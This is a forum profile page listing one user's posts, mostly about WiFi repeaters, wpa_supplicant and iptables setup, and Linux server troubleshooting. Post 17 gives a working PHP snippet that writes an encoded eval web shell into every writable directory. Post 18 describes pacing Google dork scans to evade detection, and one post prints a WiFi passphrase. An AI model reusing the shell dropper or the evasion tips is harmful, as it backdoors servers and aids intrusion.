Jump to content

i8igmac

Dedicated Members
  • Posts

    939
  • Joined

  • Last visited

  • Days Won

    22

Everything posted by i8igmac

  1. There are plenty of movies based on children and internet abductions. I would give that a try
  2. Im sorry. sometimes i do that... my eyes quick scan the forum... what kind of machines are involved? windows-msf? vs exploitable on your windows machine type ipconfig, on your exploitable type ifconfig you should find ip address's that look like 192.168.1.100 10.0.0.100 depending on your vm setup, there are a few ways of setting up the network... you must first see if they can communicate with each other your exploitable is running a apache web server im sure, see if your machine can connect to it threw the web browser http:// ip of exploit able 10.0.0.100 /
  3. Ill make a suggestion install a damn vuln operating system in another vm Perform a nmap scan to discover services running . Launch some exploits against the services The exploits are software version specific... You will learn the basics
  4. I feel the setup is as you suggest, one device associated and another is access point... I feel its a software issue and openwrt is my next attempt... alfa can't get a successful authentication.. It seens the configuration is nothing but bash and awk scripting.. witch I feel is ugly to reverse engineer Edit... i feel my testing was miss judged, and there may very well be interference floating around per the time of they day i have experienced choppy behavior. with long distance i do find more interference. alfa r36: I currently see a steady ping. 20-25ms and about 1.8MBPS... small ping spike during download test alfa r36: online game ping 180 ddwrt : I currently see a steady ping. 15-20ms and about 1.8MBPS... small ping spike during download test ddwrt: online game play ping 80 i do have better performance with ten year old ddwrt... i think this is a software problem... im going to try openwrt
  5. I have changed the channel. its a bit of a hacky process to get the thing established. Modify the config then restart the wpa process I did change the rate if wlan0 to max 54M witch did make a difference ... but I notice as soon as he bandwidth test starts, the rate drops to 1m... when bandwidth test completes, the rate goes backto 54m
  6. I am trying to setup a alfa-r36 + awus036H repeater... http://www.alfa.com.tw/faq_show.php?sn=5 some basic instructions on the setup... So, the awus036H has Associated successfully, but then Deauthentication Request is Received with a user.warn kernel: alg name:CCMP... this is a never ending loop of associated/Deauthentication this makes me think its a wpa_supplicant config error, CCMP would be a encryption type (i guess) i have logged in to the router threw nc ip:23 to see if i can make changes to the config but i fail to restart the services properly... After a fresh reset and configure with the instructions above, here is the wpa.conf generated from the web gui cat wpa.conf ctrl_interface=/var/run/wpa_supplicant driver_param="field=wext" ap_scan=2 network={ scan_ssid=1 ssid="boisture" bssid=68:7F:74:4F:4A:9F key_mgmt=WPA-PSK mode=0 proto=WPA psk="mustang68" } network={ disabled=1 id_str="localAP1" scan_ssid=1 ssid="11N 3G Router_AP" bssid=00:C0:CA:83:82:A2 key_mgmt=NONE } And here is the loop found in the logs Jan 1 00:24:35 11N_3G_USB_Router user.info kernel: ieee80211: Protocol stopped. Jan 1 00:24:35 11N_3G_USB_Router user.info kernel: ieee80211: Scanning for all networks. Jan 1 00:24:35 11N_3G_USB_Router user.info kernel: ieee80211: Protocol started. Jan 1 00:24:36 11N_3G_USB_Router user.info kernel: ieee80211: Stopping active scanning. Jan 1 00:24:36 11N_3G_USB_Router user.info kernel: ieee80211: Protocol stopped. Jan 1 00:24:36 11N_3G_USB_Router user.info kernel: ieee80211: Scanning for all networks. Jan 1 00:24:36 11N_3G_USB_Router user.info kernel: ieee80211: Protocol started. Jan 1 00:24:36 11N_3G_USB_Router user.info kernel: ieee80211: Stopping active scanning. Jan 1 00:24:36 11N_3G_USB_Router user.info kernel: ieee80211: Protocol stopped. Jan 1 00:24:36 11N_3G_USB_Router user.info kernel: ieee80211: Linking with 'boisture': Jan 1 00:24:36 11N_3G_USB_Router user.info kernel: ieee80211: Protocol started. Jan 1 00:24:36 11N_3G_USB_Router user.info kernel: ieee80211: Authenticating. Jan 1 00:24:36 11N_3G_USB_Router user.info kernel: ieee80211: Associating. Jan 1 00:24:36 11N_3G_USB_Router user.info kernel: ieee80211: Associated successfully Jan 1 00:24:36 11N_3G_USB_Router user.info kernel: rtl8187L: Link Change: IEEE80211_LINKED (B/G-Mode) Jan 1 00:24:37 11N_3G_USB_Router user.warn kernel: alg name:CCMP Jan 1 00:24:45 11N_3G_USB_Router user.info kernel: ieee80211: Deauthentication Request Received. Disassociating. Jan 1 00:24:45 11N_3G_USB_Router user.info kernel: ieee80211: Protocol stopped. Jan 1 00:24:45 11N_3G_USB_Router user.info kernel: ieee80211: Scanning for all networks. Jan 1 00:24:45 11N_3G_USB_Router user.info kernel: ieee80211: Protocol started. Jan 1 00:24:45 11N_3G_USB_Router user.info kernel: ieee80211: Stopping active scanning. Jan 1 00:24:45 11N_3G_USB_Router user.info kernel: ieee80211: Protocol stopped. Jan 1 00:24:45 11N_3G_USB_Router user.info kernel: ieee80211: Scanning for all networks. Jan 1 00:24:45 11N_3G_USB_Router user.info kernel: ieee80211: Protocol started. Jan 1 00:24:45 11N_3G_USB_Router user.info kernel: ieee80211: Stopping active scanning. Jan 1 00:24:45 11N_3G_USB_Router user.info kernel: ieee80211: Protocol stopped. Jan 1 00:24:45 11N_3G_USB_Router user.info kernel: ieee80211: Linking with 'boisture': Jan 1 00:24:45 11N_3G_USB_Router user.info kernel: ieee80211: Protocol started. Jan 1 00:24:45 11N_3G_USB_Router user.info kernel: ieee80211: Authenticating. Jan 1 00:24:45 11N_3G_USB_Router user.info kernel: ieee80211: Associating. Jan 1 00:24:45 11N_3G_USB_Router user.info kernel: ieee80211: Associated successfully Jan 1 00:24:45 11N_3G_USB_Router user.info kernel: rtl8187L: Link Change: IEEE80211_LINKED (B/G-Mode) Jan 1 00:24:46 11N_3G_USB_Router user.warn kernel: alg name:CCMP So, with a linux machine, i can successfully authenticate with this alfa awus036H wpa_passphrase boisture mustang68 > /etc/wpa.conf network={ ssid="boisture" #psk="mustang68" psk=d62f07270325d08af1806943a8418ca6f3840f334edf596c8cfe77dbffac6022 } wpa_supplicant -Dnl80211 -iwlan0 -c/etc/wpa.conf dhclient wlan0 i feel that this is a disagreement with alfa r36 and the access point encryption type EDIT... i feel like a big boy, its working. with this new config file. ctrl_interface=/var/run/wpa_supplicant driver_param="field=wext" ap_scan=2 network={ scan_ssid=1 ssid="boisture" psk=267b143f9c4f7e21a03359394b8a399c92461e5adc2ae2f472e574ca7de3ca68 key_mgmt=WPA-PSK proto=RSN pairwise=CCMP group=TKIP } network={ disabled=1 id_str="localAP1" scan_ssid=1 ssid="11N 3G Router_AP" bssid=00:C0:CA:83:82:A2 key_mgmt=NONE } The quality is not what i expected... i like to hold a ping with google and watch a consistent 20-30 ms then start a bandwidth test with the link below http://testmy.net/dl-5004 instantly i see the ping with google go to 500ms until the link above completes...
  7. iptables --flush Iptables --table nat --flush iptables --delete-chain Iptables --table nat --delete-chain iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE iptables --append FORWARD --in-interface eth0 -j ACCEPT echo 1 > /proc/sys/net/ipv4/ip_forward echo 'dhcp-range=192.168.96.50,192.168.96.150,12h' > /etc/dnsmasq.conf ifconfig eth0 192.168.96.1 up pkill dnsmasq dnsmasq God i feel stupid lol... this was a post i made months ago... i try to post my working examples here for this reason... The above should do the job with a small modification... wlan0 is the out device. At0 can be changed to eth0 for in device...
  8. so, at the moment im waiting on a awus036h to show up in the mail for use with my alfa-r36 to complete the repeter setup... i plan on comparing bandwidth upload and download speed test's... (My source access point is a long distance away) my current repeter setup. ddwrt running on a old linksys router, old and limited on ram etc... i plan on replacing this with alfa-r36 + awus036H (still waiting, not yet tested).... So, what i have avalible to me at the moment raspberry pi b+ kali installed awus036NHA alfa-r36 So, my raspberry pi has the alfa NHA associated with the accesspoint from a long distance... ping google seems strong... now i would like to broadcast a new wifi network with my alfa-r36... i figured i could start up dhcpd and plug r36 into the pi threw ethernet? seems that i need help configuring dhcpd... at this point im lost... What does work currently, i can plug the alfa-r36 as (bridged ap mode) directly into the ddwrt...
  9. first thing how big is your SD card? Depending on how much software you would like to install. install all the essential Wireless tools... once all the software is installed create a backup of your SD card installing from the repos can be a time-consuming process, which is why I suggest backing up the sd
  10. Just curious apt-get install aufs-tools mount /dev/sdb1 /media/turdsplash/sdb1/ mount /dev/sdc5 /media/turdsplash/sdc5/ mount -t aufs -o br=/media/turdsplash/sdc5/=rw:/media/turdsplash/sdb1/=rw -o udba=reval none /var/www/html/movies/ my rc.local file... So, I have mounted 2 hard disk to the same location threw software, what are the the problems you guys can foresee with this kind of setup Software vs raid edit: updated
  11. this was just a random idea I decided to share without eating researching. my sound system does say bluetooth right on the box but I believe that is for Pandora purposes. The actual wireless speaker itself may not be Bluetooth... ill do as you and research the model
  12. Well its just a idea, I have just purchased during black Friday a soundbar with wireless sub... I notice this item was a big sale, every one has a big flat screen that is equipped with crap sound. I would say a item like this exists in a majority of homes (wireless speakers) So... is this Bluetooth? Long range Bluetooth device is a simple hack... Implementation... carwhisperer comes to mind, could record and inject to hands free Bluetooth devices... What do u guys think, I'm not so sure this is Bluetooth frequency... could be fun!
  13. im about to loose my mind... fresh install of linux mint 17 apache 2.4.7 (new secure crap) php5 install echo "<?php echo 'My first PHP script!'; ?>" > /var/www/html/test.php curl http://192.168.70.101/test.php <?php echo "My first PHP script!"; ?> Duh... php code does not execute... oh cool so lets google and find out why... oh new version, much more ecure... look at all these configs... lets make new entrys and restart apache to acheave the same resaults... what am i missing...
  14. dnsmasq... I have some post around here with examples
  15. I can't wait to see a demonstration of hardware and software: -)
  16. I'm the kind of person that would rather install server software on my own desktop and find a free domain name. 100% free
  17. Ill provide some of my exciting automation :-p this little snipp will recursively scan directorys for writable permissions and then write a small shell... If you have php execution, phpinfo(); then try eval(codebelow); carefule, this may write a few thousand shells to ur hard drive :-) chdir('../'); $path = realpath(getcwd()); $objects = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path), RecursiveIteratorIterator::SELF_FIRST); foreach($objects as $name => $object){ if (is_dir($name)) { if (is_writable($name)) { echo $name . ' '; file_put_contents($name. '/tmp.php', base64_decode("PD9ldmFsKGJhc2U2NF9kZWNvZGUoJF9HRVRbY214eXpdKSk7Pz4=")); } } }
  18. Lots of tools use a google dork search queries. Sqlmap fimap if you send request to fast you will be flagged, if you send to many in a short amount of time you will be flagged... You have to understand how many did you send? Also the length of time? Then you must slow your scanning down to evade there flagging algorithm... inurl:.php?PAGE=index.html send this query threw your browser 20 times in a row and see what happens... Let me know how many queries untill your flagged
  19. http://images.offensive-security.com/1.0.9/kali-1.0.9-rpi.img.xz This is the proper download link... I have made the mistake of downloading the wrong image and then my pi just black screened after installed and boot... unxz is the tool I used for extraction... (I think) Installation is as simple as posted above... After your first successful boot, you may notice that your harddrive space IS Not 64gig, you will have to use a tool like gparted to resize the partition from a linux machine
  20. Take the proper precautions and take notes of all changes he makes... if these changes could cause security holes or a backdoor is installed... would be exciting if you caught him in the act... I'm no security pro... I would list all files recursively Modification dates could be logged and compared... Or list all files and grep threw each day he has access... ls -alR /var/www/root | grep $date
  21. a while back I was building the pyrit database and it does the duplicate filtering for you with its gpu powers... I can confirm the above post this is not a 100% uniq list. It may have been clean at one point...
  22. geforce 560m... screen size is not at all small but im not sure of its size... i would love to upgraid look at all the new beastly options... cerealKiller:" Ill bet it looks crispy in the dark" zerocool:" Are you sure this thing is not going to waist" "maybe its to much machine for you"
  23. Is price a problem? I picked up one of these display models at bestbuy for 900$ a few years ago.... absolutely love it... #1. Nvidia... 14000 pSk... wifi cracking machine... #2. Look at the vents on this machine. Overheat kills ALL... lost a few labtops already. #3. Cpu, ram, hd, its all performance machine... keys that glow was a must for me... When buying any new machine, don't get the best of the best.... new machines take a little time for kali to work out of the box...
  24. I have a linux desktop with a default install squid3... Any one use squid as a caching proxy? Care to share your squid3.conf? a google search of 'squid3.conf pastebin' shows lots of examples. my goal is to help out raspbmc., my xbmc raspberry pi could maybe load from cache images and videos... it looks like squid can cache content by regex *.jpg *.mkv *.avi *.etc
  25. (Cisco m10 internet source) (Ddwrt repeater) (My devices, droid, desktop, labtop etc. Connected to repeater) So i have 2 issues I would like to resolve. Port forwarding. should I use repeater bridge? what I have tried, cisco forward to ddwrt then ddwrt forward to my desktop, but I get no response from online port scanners.... This next issue is odd... all my machines connected to ddwrt threw wifi can not ping each other or use any services... my desktop is plugged into ddwrt by Ethernet, my other wifi associated machines can ping the desktop and use the services like ftp ssh etc...
×
×
  • Create New...